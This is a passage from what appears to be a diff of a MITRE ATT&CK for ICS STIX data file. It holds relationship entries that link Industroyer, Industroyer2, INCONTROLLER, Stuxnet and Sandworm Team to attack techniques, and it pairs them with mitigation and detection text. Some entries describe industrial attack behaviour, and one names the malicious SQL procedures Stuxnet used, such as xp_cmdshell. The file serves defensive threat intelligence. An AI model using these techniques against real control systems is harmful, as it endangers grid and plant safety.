+ "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-06T22:09:44.559Z", + "description": "[Industroyer2](https://attack.mitre.org/software/S1072) modifies specified Information Object Addresses (IOAs) for specified Application Service Data Unit (ASDU) addresses to either the ON or OFF state.(Citation: Industroyer2 Mandiant April 2022)(Citation: Industroyer2 Forescout July 2022)", + "relationship_type": "uses", + "source_ref": "malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5", + "target_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--366a4cd1-aa95-4985-9d80-b45a2551e298", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.179Z", + "relationship_type": "mitigates", + "description": "Filter for protocols and payloads associated with program download activity to prevent unauthorized device configurations.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--c4122b58-f1b2-4656-a715-55016700bf75", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:56:39.825Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604) automatically collects protocol object data to learn about control devices in the environment. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--07f4d65d-4572-450f-8cb2-908fee97bd67", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.228Z", + "relationship_type": "mitigates", + "description": "Application control may be able to prevent the running of executables masquerading as other files.\n", + "source_ref": "course-of-action--4fa717d9-cabe-47c8-8cdd-86e9e2e37f30", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--243ad7b2-546c-4bf2-a3c0-1438b13e197d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.169Z", + "relationship_type": "mitigates", + "description": "Systems and devices should restrict access to any data with potential confidentiality concerns, including point and tag information.\n", + "source_ref": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "target_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--ee1a52bc-6c1b-4e2c-b296-173dccbc020a", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:44:27.451Z", + "description": "Use deep packet inspection to look for artifacts of common exploit traffic, such as known payloads.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e8eaac2d-a4bf-408f-b24f-14471db7059b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.088Z", + "relationship_type": "mitigates", + "description": "Minimize permissions and access for service accounts to limit the information that may be impacted by malicious users or software. (Citation: National Institute of Standards and Technology April 2013)\n", + "source_ref": "course-of-action--622fe4d4-0e8e-4d17-9c25-6c9cef1f15d5", + "target_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "external_references": [ + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7411b05d-209a-4907-83ce-00ab1538fbac", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.084Z", + "relationship_type": "mitigates", + "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific C2 protocol used by a particular adversary or tool and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: Gardiner, J., Cova, M., Nagaraja, S February 2014)\n", + "source_ref": "course-of-action--3172222b-4983-43f7-8983-753ded4f13bc", + "target_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "external_references": [ + { + "source_name": "Gardiner, J., Cova, M., Nagaraja, S February 2014", + "description": "Gardiner, J., Cova, M., Nagaraja, S 2014, February Command & Control Understanding, Denying and Detecting Retrieved. 2016/04/20 ", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--eb1e05ef-58df-4c6d-acd7-5cc63ff7f44f", + "created": "2021-10-08T15:42:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos Inc. June 2017", + "description": "Dragos Inc. 2017, June 13 Industroyer - Dragos - 201706: Analysis of the Threat to Electic Grid Operations Retrieved. 2017/09/18 ", + "url": "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:01:24.078Z", + "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) establishes an internal proxy prior to the installation of backdoors within the network. (Citation: Dragos Inc. June 2017)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--65a45501-10de-46a2-89bf-03bbf17aba33", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.166Z", + "relationship_type": "mitigates", + "description": "Perform integrity checks of firmware before uploading it on a device. Utilize cryptographic hashes to verify the firmware has not been tampered with by comparing it to a trusted hash of the firmware. This could be from trusted data sources (e.g., vendor site) or through a third-party verification service.\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--08a4f730-bc3f-4050-973f-1ef2847db4e7", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:57:47.375Z", + "description": "Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g., monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1c831708-28c2-47ae-a158-39f1f7b73406", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-29T20:10:57.573Z", + "description": "The [Industroyer](https://attack.mitre.org/software/S0604) IEC 61850 payload component has the ability to discover relevant devices in the infected host's network subnet by attempting to connect on port 102.(Citation: Anton Cherepanov, ESET June 2017)\n\n[Industroyer](https://attack.mitre.org/software/S0604) contains an OPC DA module that enumerates all OPC servers using the `ICatInformation::EnumClassesOfCategories` method with `CATID_OPCDAServer20` category identifier and `IOPCServer::GetStatus` to identify the ones running.", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f0c8a954-c1a0-453a-9c1d-484305abdab2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-12T18:59:17.429Z", + "modified": "2022-05-06T17:47:24.189Z", + "relationship_type": "mitigates", + "description": "Filter application-layer protocol messages for remote services to block any unauthorized activity.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--b778b3c3-5dd3-4c0b-b7d9-78e6bb40a544", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T20:51:43.487Z", + "description": "Monitor for unusual network traffic that may indicate additional tools transferred to the system. Use network intrusion detection systems, sometimes with SSL/TLS inspection, to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b346eec8-de90-407c-b665-387086bb4553", + "created": "2022-09-29T01:36:02.223Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + }, + { + "source_name": "Brubaker-Incontroller", + "description": "Nathan Brubaker, Keith Lunden, Ken Proska, Muhammad Umair, Daniel Kapellmann Zafra, Corey Hildebrandt, Rob Caldwell. (2022, April 13). INCONTROLLER: New State-Sponsored Cyber Attack Tools Target Multiple Industrial Control Systems. Retrieved September 28, 2022.", + "url": "https://www.mandiant.com/resources/incontroller-state-sponsored-ics-tool" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.444Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can use the CODESYS protocol to upload programs from Schneider PLCs.(Citation: Wylie-22)(Citation: Brubaker-Incontroller) \n\n[INCONTROLLER](https://attack.mitre.org/software/S1045) can obtain existing program logic from Omron PLCs by using either the program upload or backup functions available through the HTTP server.(Citation: Wylie-22) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a2142552-6b8d-4751-a3d4-1471420c02fc", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:15:48.476Z", + "description": "Monitor for newly constructed network connections into a service specifically designed to accept remote connections, such as RDP, Telnet, SSH, and VNC. Monitor network connections involving common remote management protocols, such as ports tcp:3283 and tcp:5900, as well as ports tcp:3389 and tcp:22 for remote logins. The adversary may use [Valid Accounts](https://attack.mitre.org/techniques/T0859) to enable remote logins.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--491455dc-f7c8-4e12-811b-b8c5c041b4c3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.102Z", + "relationship_type": "mitigates", + "description": "Protocols used for control functions should provide authenticity through MAC functions or digital signatures. If not, utilize bump-in-the-wire devices or VPNs to enforce communication authenticity between devices that are not capable of supporting this (e.g., legacy controllers, RTUs).\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--a04169ed-c16b-466b-80ef-22a11067f475", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:54:58.401Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604) is able to block serial COM channels temporarily causing a denial of view. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--56ddc820-6cfb-407f-850b-52c035d123ac", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--dc15440d-6683-435a-8c87-64daea29bcaa", + "created": "2021-04-11T14:06:54.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:01:03.550Z", + "description": "In the Ukraine 2015 Incident, [Sandworm Team](https://attack.mitre.org/groups/G0034) blocked command messages by using malicious firmware to render communication devices inoperable. (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--8ecf5eac-7767-411b-b54a-b374ea51b9e9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.139Z", + "relationship_type": "mitigates", + "description": "Hot-standbys in diverse locations can ensure continued operations if the primarily system are compromised or unavailable. At the network layer, protocols such as the Parallel Redundancy Protocol can be used to simultaneously use redundant and diverse communication over a local network. (Citation: M. Rentschler and H. Heine)\n", + "source_ref": "course-of-action--f0f5c87a-a58d-440a-b3b5-ca679d98c6dd", + "target_ref": "attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36", + "external_references": [ + { + "source_name": "M. Rentschler and H. Heine", + "description": "M. Rentschler and H. Heine The Parallel Redundancy Protocol for industrial IP networks Retrieved. 2020/09/25 ", + "url": "https://ieeexplore.ieee.org/document/6505877" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--eaeb3c8d-9d91-4eb0-8049-5cb99e141026", + "created": "2021-10-08T15:25:32.143Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:20:42.055Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) executes malicious SQL commands in the WinCC database server to propagate to remote systems. The malicious SQL commands include xp_cmdshell, sp_dumpdbilog, and sp_addextendedproc. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--052552e9-eac0-4b37-9df8-2e921053e305", + "created": "2023-03-30T19:05:17.003Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:05:17.003Z", + "description": "Monitor for unexpected/abnormal access to files that may be malicious collection of local data, such as user files (e.g., .pdf, .docx, .jpg, .dwg ) or local databases.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6be4cef2-3d54-4cd8-97df-8a8b37c03605", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.089Z", + "relationship_type": "mitigates", + "description": "Utilize central storage servers for critical operations where possible (e.g., historians) and keep remote backups. For outstations, use local redundant storage for event recorders. Have backup control system platforms, preferably as hot-standbys to respond immediately to data destruction events. (Citation: National Institute of Standards and Technology April 2013)\n", + "source_ref": "course-of-action--ad12819e-3211-4291-b360-069f280cff0a", + "target_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "external_references": [ + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--327916f7-fe5d-4858-adeb-f72f74c60c25", + "created": "2021-10-08T15:25:32.143Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:11:45.996Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) sends an SQL statement that creates a table and inserts a binary value into the table. The binary value is a hex string representation of the main Stuxnet DLL as an executable file (formed using resource 210) and an updated configuration data block. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ea817c7a-9424-4204-90a5-6f8fb86037be", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.230Z", + "relationship_type": "mitigates", + "description": "Configure features related to account use like login attempt lockouts, specific login times, and password strength requirements as examples. Consider these features as they relate to assets which may impact safety and availability. (Citation: Keith Stouffer May 2015)\n", + "source_ref": "course-of-action--86b455f2-fb63-4043-93a8-32a3a7703a02", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--84e535be-960a-450a-91f9-4dc8c5e3f69d", + "created": "2021-04-11T14:06:54.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:56:37.468Z", + "description": "In the Ukraine 2015 Incident, [Sandworm Team](https://attack.mitre.org/groups/G0034) utilized HMI GUIs in the SCADA environment to open breakers. (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": 